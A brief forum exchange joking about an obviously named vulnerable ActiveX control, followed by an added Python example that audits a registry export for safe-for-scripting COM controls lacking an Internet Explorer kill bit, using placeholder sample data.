
And that's why this vulnerability was found, because the name was so damn obvious. It's as if you had an active x control registered that was named "rootkit".

This one must be the decoy. Imagine what else could be hidden in there and not named "Please throw me in the briar patch!"
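An audit for the question raised in the comment above, added here as an example and not part of the thread or of any vendor tooling: it reads the text of a registry export (assumed already decoded) and lists COM controls registered as "safe for scripting" that have no Internet Explorer kill bit set. The sample export, CLSIDs and file paths are constructed placeholders.

```python
import re

CATID_SAFE_FOR_SCRIPTING = "{7DD95801-9882-11CF-9FA9-00AA006C42C4}"  # "safe for scripting" category
KILL_BIT = 0x400  # "Compatibility Flags" bit that stops IE from instantiating a control
CLSID_KEY = re.compile(r"^HKEY_CLASSES_ROOT\\CLSID\\(\{[0-9A-F-]{36}\})\\(.+)$", re.I)
COMPAT_KEY = re.compile(r"\\ActiveX Compatibility\\(\{[0-9A-F-]{36}\})$", re.I)

# Constructed sample export: CLSIDs and file paths are placeholders, not real controls.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{11111111-1111-1111-1111-111111111111}\InprocServer32]
@="C:\\Example\\LauncherCtl.ocx"
[HKEY_CLASSES_ROOT\CLSID\{11111111-1111-1111-1111-111111111111}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}]
[HKEY_CLASSES_ROOT\CLSID\{22222222-2222-2222-2222-222222222222}\InprocServer32]
@="C:\\Example\\Blocked.ocx"
[HKEY_CLASSES_ROOT\CLSID\{22222222-2222-2222-2222-222222222222}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}]
[HKEY_CLASSES_ROOT\CLSID\{33333333-3333-3333-3333-333333333333}\InprocServer32]
@="C:\\Example\\NotScriptable.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{22222222-2222-2222-2222-222222222222}]
"Compatibility Flags"=dword:00000400
"""

def parse_reg(text):
    """Parse .reg export text into {key_path: {value_name: value}}."""
    keys, current = {}, None
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1], {})
        elif current is not None and "=" in line:
            name, _, raw = line.partition("=")
            is_dword = raw.startswith("dword:")
            value = int(raw[6:], 16) if is_dword else raw.strip('"').replace("\\\\", "\\")
            current[name.strip('"')] = value
    return keys

def audit(text):
    """Return (CLSID, server path) for safe-for-scripting controls lacking a kill bit."""
    controls, killed = {}, set()
    for path, values in parse_reg(text).items():
        m = CLSID_KEY.match(path)
        if m:
            info = controls.setdefault(m.group(1).upper(), {"server": None, "safe": False})
            if m.group(2).lower() == "inprocserver32":
                info["server"] = values.get("@")
            elif m.group(2).upper() == "IMPLEMENTED CATEGORIES\\" + CATID_SAFE_FOR_SCRIPTING:
                info["safe"] = True
        k = COMPAT_KEY.search(path)
        flags = values.get("Compatibility Flags")
        if k and isinstance(flags, int) and flags & KILL_BIT:
            killed.add(k.group(1).upper())
    return sorted((c, i["server"]) for c, i in controls.items() if i["safe"] and c not in killed)
```

Each entry `audit()` returns is a control that script on a page could instantiate without restriction in the IE versions discussed here, so those are the binaries whose exposed methods are worth reviewing.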